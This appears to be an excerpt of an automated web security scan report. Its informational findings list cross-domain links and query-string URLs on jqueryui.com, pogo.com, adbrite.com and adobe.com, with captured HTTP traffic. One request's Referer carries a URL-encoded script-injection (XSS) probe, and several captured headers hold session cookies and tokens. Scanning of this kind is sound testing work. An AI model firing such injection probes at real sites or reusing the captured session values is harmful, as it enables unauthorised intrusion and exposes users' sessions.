http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/themes/base/jquery-ui.css
http://docs.jquery.com/Donate
http://jquery.com/
http://jquery.org/
http://plugins.jquery.com/
http://static.jquery.com/ui/css/base2.css
http://static.jquery.com/ui/themeroller/app_css/app_screen.css
http://static.jquery.com/ui/themeroller/scripts/app.js
http://www.filamentgroup.com/

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 119917

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureH
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">© 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

16.31. http://word-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://word-games.pogo.com/?pageSection=footer_word

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?
http://ad.doubleclick.net/adj/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?
http://ad.doubleclick.net/jump/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/24.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/35.png
http://connect.facebook.net/en_US/all.js
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=367062598
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1068507910/?label=IRRsCNbQ2AEQhsbA_QM&guid=ON&script=0
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:29:16 GMT
Server: Apache-Coyote/1.1
Content-Length: 106137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

   <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?"></script><noscript><a href="http://ad.doubleclick.net/jump/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?" target="ad"><img src="http://ad.doubleclick.net/ad/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww35-forward?site=pogo&pageSection=ag_1list19_img_ww35"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/35.png" alt="SCRABBLE Cubes" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww24-forward?site=pogo&pageSection=ag_1list20_img_ww24"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/24.png" alt="Word Mojo" width="80" height="45" /></a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=367062598"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068507910/?label=IRRsCNbQ2AEQhsbA_QM&guid=ON&script=0"/>
</div>
...[SNIP]...

16.32. http://word-games.pogo.com/games/scrabble previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/games/scrabble

Issue detail

The page was loaded from a URL containing a query string:

http://word-games.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1083015149
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1
Host: word-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B

Response

16.33. http://www.adbrite.com/mb/commerce/purchase_form.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adbrite.com
Path:	/mb/commerce/purchase_form.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.adbrite.com/mb/commerce/purchase_form.php?other_product_id=1482461&fg_state=a%3D%26search%3Dpandora%26directory-search-submit%3D%2B%2BGo%2B%2B%26pub_landing_version%3D3%26ut%3D1%253ATY%252FBEoIgFEX%252FhTUL1Izob0AJFVFBSC369x5qM62YOZx7L7zRM0f3N9J

The response contains the following links to other domains:

http://clicktoverify.truste.com/pvr.php?page=validate&url=www.adbrite.com&sealid=102
http://www.export.gov/safeharbor/
http://www.iab.net/
http://www.networkadvertising.org/
http://www.pandora.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:58:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: ADBRITE_SESS_1=u5gs1kt8io2c4nd9mvlroei9f6; expires=Mon, 17 Jan 2011 02:58:29 GMT; path=/; domain=www.adbrite.com
Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:29 GMT; path=/
Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:29 GMT; path=/
Connection: close
Content-Length: 22604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>adBrite - Advertise on Pandora</title>
<meta http-equi
...[SNIP]...
<h2>Single Text Ad - <a target=_blank href="http://www.pandora.com" style="font-weight:normal;">http://www.pandora.com</a>
...[SNIP]...
</a>
END SCANALERT CODE -->
<a href="http://www.iab.net/" target="_new"><img src="http://files.adbrite.com/mb/images/iab_footer_dark.gif" vspace=3 border="0" /></a>
<a href="http://clicktoverify.truste.com/pvr.php?page=validate&url=www.adbrite.com&sealid=102" target="_blank"><img src="http://files.adbrite.com/mb/images/truste_seal_eu_dark.gif" alt="Truste" width="105" height="30" style="margin:5px 0 6px 0;" border="0" /></a>
<a href="http://www.networkadvertising.org/" target="_blank"><img src="http://files.adbrite.com/mb/images/NAI_Logo_FINAL_dark.jpg" alt="NAI" width="81" height="30" style="margin:5px 0 6px 0;" border="0" /></a>
<a href="http://www.export.gov/safeharbor/" target="_blank"><img src="http://files.adbrite.com/mb/images/eg_main_dark.gif" alt="Safe Harbor" width="106" height="35" style="margin:3px 0 3px 0;" border="0" />
...[SNIP]...

16.34. http://www.adobe.com/cfusion/marketplace/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/marketplace/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.adobe.com/cfusion/marketplace/index.cfm?event=marketplace.home&marketplaceid=1

The response contains the following links to other domains:

http://download.macromedia.com/pub/developer/airmarketplace/marketplace.html
http://upload.macromedia.com/marketplace/offering/10023/thumb-3A8B5252-F212-063B-468E3E82A161773A.jpg
http://upload.macromedia.com/marketplace/offering/10028/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10033/thumb-57E3A564-DB1F-C651-D81A799524B7A9B7.png
http://upload.macromedia.com/marketplace/offering/10037/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10125/thumb-554463B4-AE5B-A49D-1B9CF757F9D3AE53.png
http://upload.macromedia.com/marketplace/offering/10162/thumb-044DF9A2-F6E6-01FE-AE0275984089F95E.jpg
http://upload.macromedia.com/marketplace/offering/10175/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10177/thumb-9EC6BA62-ED03-93F2-2130DB2390F10C16.png
http://upload.macromedia.com/marketplace/offering/10187/thumb-ADAC6CA9-C151-2170-4B5638DAD61D8D84.png
http://upload.macromedia.com/marketplace/offering/10201/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10223/thumb.gif
http://upload.macromedia.com/marketplace/offering/10236/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10250/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10303/thumb-234574AD-98F2-2E76-35A53FC01B18171E.png
http://upload.macromedia.com/marketplace/offering/10307/thumb.gif
http://upload.macromedia.com/marketplace/offering/10313/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10342/thumb.jpg
http://upload.macromedia.com/marketplace/offering/10343/thumb.jpeg
http://upload.macromedia.com/marketplace/offering/10740/thumb-C98977BE-D719-D032-ECDAE81567E5C9F8.png
http://upload.macromedia.com/marketplace/offering/10820/thumb-72DA8607-DC5A-EF2E-777BA9E2B1839A5B.jpg
http://upload.macromedia.com/marketplace/offering/10960/thumb-9068F20D-91E3-B1DE-3AE13AD726FBFB4E.png
http://upload.macromedia.com/marketplace/offering/12445/thumb-FA9FED82-AB15-3EA4-B0F09DCD19F21163.jpg
http://upload.macromedia.com/marketplace/offering/12801/thumb-2E58C819-A8F7-CFD9-760559A44C4BCD0A.jpg
http://upload.macromedia.com/marketplace/offering/14741/thumb-BFF479E1-0542-9697-9D2163FE6D8F957C.jpg
http://upload.macromedia.com/marketplace/offering/15480/thumb-55833170-B925-A41F-196BF6A5E8BF0425.png
http://upload.macromedia.com/marketplace/offering/16002/thumb-CC4F9086-96BF-7F5E-14661264861DBED5.jpg
http://upload.macromedia.com/marketplace/offering/16141/thumb-0268B7C2-C3AF-24B7-35739D4816D3B1D3.png
http://upload.macromedia.com/marketplace/offering/16144/thumb-0334CA9A-EB60-ECA3-48E13427128C1ED4.png
http://upload.macromedia.com/marketplace/offering/16145/thumb-0337FCC0-9FA2-81EE-5BC861871A9CC6B6.png
http://upload.macromedia.com/marketplace/offering/16146/thumb-033D2A06-FCBF-41D6-3504B840D17E0F2B.png
http://upload.macromedia.com/marketplace/offering/16157/thumb-080F5695-C608-4D4E-132E294D79B43B24.jpg
http://upload.macromedia.com/marketplace/offering/16460/thumb-5C13EA49-AA24-6684-C1B67F8ECDED9048.png
http://upload.macromedia.com/marketplace/offering/16581/thumb-AC088B9E-FB27-E05A-E79ED6E802056968.jpg
http://upload.macromedia.com/marketplace/offering/16720/thumb-0E21A679-BFCE-2696-C9945381A8568E43.png
http://upload.macromedia.com/marketplace/offering/16744/thumb-7187223C-A13E-384D-1277E56727847C79.png
http://upload.macromedia.com/marketplace/offering/17007/thumb-50132719-BFF2-BBC3-45C6C12D274FFE5C.png
http://upload.macromedia.com/marketplace/offering/17318/thumb-A1AE80DC-A7EA-FEC0-C2FF5814A27C981D.png
http://upload.macromedia.com/marketplace/offering/17729/thumb-4F8222C0-F1B8-DA0C-EAD5A5DE205062EC.png
http://upload.macromedia.com/marketplace/offering/17762/thumb-11916CE6-0DD3-4808-859069580299F128.png
http://upload.macromedia.com/marketplace/offering/18260/thumb-99F107B4-F92C-B8A9-AF574C0B3A93DD11.png
http://upload.macromedia.com/marketplace/offering/18718/thumb-5B87A563-9DE5-CE1F-5AF17DFF78E8B660.png
http://upload.macromedia.com/marketplace/offering/18784/thumb-A0FAC8E5-ED1C-657E-AC6BB2DEAB15CC10.png
http://upload.macromedia.com/marketplace/offering/18824/thumb-1C5D150C-B276-E920-4BBC41749045CA88.png
http://upload.macromedia.com/marketplace/offering/18882/thumb-DC2715B5-B731-9625-8F835DD2F3C3EBAD.png
http://upload.macromedia.com/marketplace/offering/18902/thumb-56F0B18A-B700-145E-8F5BB0646B106089.png
http://upload.macromedia.com/marketplace/offering/18922/thumb-76907EE9-A2A4-627A-44BD5CFD68C88546.png
http://upload.macromedia.com/marketplace/offering/19025/thumb-F3A56A9B-EE25-30BE-9F4D0F5237D5456F.png
http://upload.macromedia.com/marketplace/offering/19073/thumb-5A05371B-0CF1-D602-DA547DCA809AFF0C.png
http://upload.macromedia.com/marketplace/offering/19145/thumb-157A7435-C540-077F-A20C367ABC4447DE.png
http://upload.macromedia.com/marketplace/offering/19187/thumb-5B61BCC4-9142-54B1-C0CB1B912A9FE342.png
http://upload.macromedia.com/marketplace/offering/19188/featured-721B07F3-F25B-98CC-00CAF4382E78E73A.png
http://upload.macromedia.com/marketplace/offering/19193/thumb-8A81DF4F-FF32-EB3D-8AD3A6CD565FCD26.png
http://upload.macromedia.com/marketplace/offering/19201/thumb-8D7105EF-068B-E2B5-D3AD93CD45D4030B.png
http://upload.macromedia.com/marketplace/offering/19204/thumb-8DBE9E27-BB54-E508-F98E57BAF2ED3C2A.png
http://upload.macromedia.com/marketplace/offering/19225/thumb-5A4FA2F9-F13D-F738-07CEF71ED8BCACA6.png
http://upload.macromedia.com/marketplace/offering/19246/thumb-6D44DFA4-B5E9-9584-D03025EC6CC96179.png
http://upload.macromedia.com/marketplace/offering/19350/thumb-EEABDC59-B875-1867-E76D6C4245BC9BDA.jpg
http://upload.macromedia.com/marketplace/offering/19386/thumb-748DC6F9-E920-493E-ABD46F1CB111158E.png
http://upload.macromedia.com/marketplace/offering/19614/thumb-CFA12FE3-08FB-68A8-BDD667492FFA4F1A.png
http://upload.macromedia.com/marketplace/offering/19628/thumb-D589D220-F878-B287-F7F5A1EEFE0DFA1C.png
http://upload.macromedia.com/marketplace/offering/19657/thumb-C340D610-F783-A15A-740A265DF3D90A85.png
http://upload.macromedia.com/marketplace/offering/19663/thumb-2C4B5846-D46F-8631-E4B2F4939C441DF5.png
http://upload.macromedia.com/marketplace/offering/19665/thumb-33E4D628-F546-F2D1-4E825B7D46B13FC1.png
http://upload.macromedia.com/marketplace/offering/19669/featured-6B82D66B-EE38-CEF0-0E319836B4D100AD.jpg
http://upload.macromedia.com/marketplace/offering/19669/thumb-EF5B0334-DF38-7B7A-21A5402D160D75C4.jpg
http://upload.macromedia.com/marketplace/offering/20181/thumb-64BE1B99-A62F-7BD4-A562BBFBCE9845C9.png
http://upload.macromedia.com/marketplace/offering/20387/thumb-E454D214-DE28-6C77-D6C00FECAA1D9DB3.png
http://upload.macromedia.com/marketplace/offering/20513/thumb-4084135E-C122-424A-1B3E94490F1C0073.png
http://upload.macromedia.com/marketplace/offering/20514/thumb-40921E9E-DC0F-FC47-B8A2540929E150DC.png
http://upload.macromedia.com/marketplace/offering/20515/thumb-40A05332-C0C3-BC33-5CF0AD328E3C8050.png
http://upload.macromedia.com/marketplace/offering/20516/thumb-40A4850D-01A4-13D4-AB2FC3EE19A4EBDD.png
http://upload.macromedia.com/marketplace/offering/20517/thumb-40ACDC0E-F6BF-C803-9BBB21AEEC65A61E.png
http://upload.macromedia.com/marketplace/offering/20518/thumb-40BD908E-F622-D0A3-63A3D6369314D4E2.png
http://upload.macromedia.com/marketplace/offering/20519/thumb-4FB955B2-C2B4-C35A-228975FA444B5BA9.png
http://upload.macromedia.com/marketplace/offering/20520/thumb-4FC3C1A3-C70A-1B35-4164605E44F1C72F.png
http://upload.macromedia.com/marketplace/offering/20521/thumb-4FD92EBC-D9E8-E00D-90B627A93D82A42D.png
http://upload.macromedia.com/marketplace/offering/20522/thumb-4FECC40F-FAA0-D1F9-8673F828E05F9B27.png
http://upload.macromedia.com/marketplace/offering/20523/thumb-4FFE5BAD-AFCF-0241-8FF305C501A76AFC.png
http://upload.macromedia.com/marketplace/offering/20524/thumb-501021AC-F8DF-18DE-B8313917C737CAC4.png
http://upload.macromedia.com/marketplace/offering/20525/thumb-5022E8DC-F503-9688-2948DF9A85EEACFF.png
http://upload.macromedia.com/marketplace/offering/20526/thumb-50315A81-A40E-B461-3FCF65731BFBF90E.png
http://upload.macromedia.com/marketplace/offering/20527/thumb-503C2242-03C6-5503-DE2BF04BFE93EE03.png
http://upload.macromedia.com/marketplace/offering/20528/thumb-50550B99-FE92-95D5-D5837D196DBEA181.png
http://upload.macromedia.com/marketplace/offering/20529/thumb-5063FB80-E828-8A1D-59D2E48F79DD36DA.png
http://upload.macromedia.com/marketplace/offering/20530/thumb-507120D2-D18E-0F7F-02DC211430BAA77A.png
http://upload.macromedia.com/marketplace/offering/20531/thumb-5085AAA6-BB6F-C3E5-EE32BF08463D63FB.png
http://upload.macromedia.com/marketplace/offering/20532/thumb-50949C56-C286-B619-1BAA45DDE078B0F3.png
http://upload.macromedia.com/marketplace/offering/20533/thumb-50A919E3-F53E-CFD6-E38C901212EB7624.png
http://upload.macromedia.com/marketplace/offering/20534/thumb-50B644A5-955E-7A5F-96D7E618CD1A7EED.png
http://upload.macromedia.com/marketplace/offering/20535/thumb-50BAD7B0-C38D-7881-92C5B287EC1FC7A9.png
http://upload.macromedia.com/marketplace/offering/20537/thumb-50E62C28-ACF2-60BC-C1486EC6D5A928AB.png

Request

GET /cfusion/marketplace/index.cfm?event=marketplace.home&marketplaceid=1 HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:25:35 GMT
Server: JRun Web Server
Set-Cookie: CFID=8626245;expires=Tue, 01-Jan-2041 05:25:35 GMT;path=/
Set-Cookie: CFTOKEN=9f0857e9ee75f18a-1C5E14AD-AF0C-09A1-28CBAEE9C12EF725;expires=Tue, 01-Jan-2041 05:25:35 GMT;path=/
Set-Cookie: DYLANSESSIONID=4830ed9d84b462831532656f131e5f325e69;path=/
Set-Cookie: UID=1C5E14D2%2DCBAF%2D60A8%2D76633D0625AAE8BD;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:35 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:35 GMT;path=/cfusion
Environment: webapp-da1-02.corp.adobe.com:8500
Content-Language: en-US
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Set-Cookie: DylanApp-BigIP=223114250.13345.0000; path=/
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<a href="/cfusion/marketplace/index.cfm?marketplaceid=1&userid=&event=marketplace.offering&offeringid=19188" class="offeringFeatImg"><img src="http://upload.macromedia.com/marketplace/offering/19188/featured-721B07F3-F25B-98CC-00CAF4382E78E73A.png" width="308" height="155" /></a>
...[SNIP]...
<a href="/cfusion/marketplace/index.cfm?marketplaceid=1&userid=&event=marketplace.offering&offeringid=19669" class="offeringFeatImg"><img src="http://upload.macromedia.com/marketplace/offering/19669/featured-6B82D66B-EE38-CEF0-0E319836B4D100AD.jpg" width="308" height="155" /></a>
...[SNIP]...
<a href="index.cfm?event=marketplace.offering&offeringid=19669&marketplaceid=1"><img src="http://upload.macromedia.com/marketplace/offering/19669/thumb-EF5B0334-DF38-7B7A-21A5402D160D75C4.jpg" class="thumbnail_image"></a>
...[SNIP]...
<a href="index.cfm?event=marketplace.offering&offeringid=19663&marketplaceid=1"><img src="http://upload.macromedia.com/marketplace/offering/19663/thumb-2C4B5846-D46F-8631-E4B2F4939C441DF5.png" class="thumbnail_image"></a>
...[SNIP]...
<a href="index.cfm?event=marketplace.offering&offeringid=19657&marketplaceid=1"><img src="http://upload.macromedia.com/marketplace/offering/19657/thumb-C340D610-F783-A15A-740A265DF3D90A85.png" class="thumbnail_image"></a>
...[SNIP]...
<a href="index.cfm?event=marketplace.offering&offeringid=19628&marketplaceid=1"><img src="http://upload.macromedia.com/marketplace/offering/19628/thumb-D589D220-F878-B287-F7F5A1EEFE0DFA1C.png" class="thumbnail_image"></a>
...[SNIP]...
